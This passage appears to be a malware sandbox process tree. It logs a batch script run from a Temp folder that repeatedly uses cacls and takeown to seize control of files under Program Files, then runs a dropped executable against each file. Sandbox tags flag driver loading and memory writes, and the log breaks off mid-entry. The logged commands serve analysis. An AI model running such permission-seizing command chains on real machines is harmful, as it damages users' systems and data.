C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1084
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1224 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb64.exetuXIqMZb.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1572
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:1740 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:1712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵PID:1844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:1624 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:1900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1120 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1396
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:528 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:1160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1324
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:1136 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵PID:692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1240
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1252
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:1984 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2024 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1100
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:1816 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:1648 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""2⤵
- Loads dropped DLL
PID:1216 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C3⤵PID:1556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "FreeCellMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:832 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "FreeCellMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:1184
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""2⤵
- Loads dropped DLL
PID:1484 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C3⤵PID:460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "HeartsMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:1104 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "HeartsMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:964
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:680 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1356
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵PID:1724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:1592 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""2⤵
- Loads dropped DLL
PID:1324 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C3⤵PID:1120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MahjongMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:1180 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MahjongMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""2⤵
- Loads dropped DLL
PID:1168 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C3⤵PID:1216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ChessMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:460 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ChessMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:804
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1776
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""2⤵
- Loads dropped DLL
PID:2024 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PurblePlaceMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PurblePlaceMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵
- Loads dropped DLL
PID:2008 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:1192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Workflow.Targets" -nobanner3⤵
- Loads dropped DLL
PID:408 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Workflow.Targets" -nobanner4⤵
- Executes dropped EXE
PID:528
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""2⤵
- Loads dropped DLL
PID:1184 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C3⤵PID:1848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "SpiderSolitaireMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:1824 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "SpiderSolitaireMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:1144
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""2⤵
- Loads dropped DLL
PID:956 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C3⤵PID:964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "SolitaireMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:1844 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "SolitaireMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui""2⤵
- Loads dropped DLL
PID:1984 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui" /E /G Admin:F /C3⤵PID:1724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner3⤵
- Loads dropped DLL
PID:1512 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:1424
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui""2⤵
- Loads dropped DLL
PID:864 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui" /E /G Admin:F /C3⤵PID:436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "jnwmon.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1556 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "jnwmon.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui""2⤵
- Loads dropped DLL
PID:1084 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵PID:1588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1900 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1712
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""2⤵
- Loads dropped DLL
PID:1752 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PDIALOG.exe" -nobanner3⤵
- Loads dropped DLL
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PDIALOG.exe" -nobanner4⤵
- Executes dropped EXE
PID:1104
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp""2⤵
- Loads dropped DLL
PID:2012 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C3⤵PID:1252
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Shorthand.jtp" -nobanner3⤵
- Loads dropped DLL
PID:528 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Shorthand.jtp" -nobanner4⤵
- Executes dropped EXE
PID:1180
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui""2⤵
- Loads dropped DLL
PID:1504 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:1716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1900 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:832
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵
- Loads dropped DLL
PID:1848 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1516
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui""2⤵
- Loads dropped DLL
PID:900 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui" /E /G Admin:F /C3⤵PID:1908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵
- Loads dropped DLL
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner4⤵
- Executes dropped EXE
PID:1856
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""2⤵
- Loads dropped DLL
PID:324 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1648 -
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵
- Loads dropped DLL
PID:1984 -
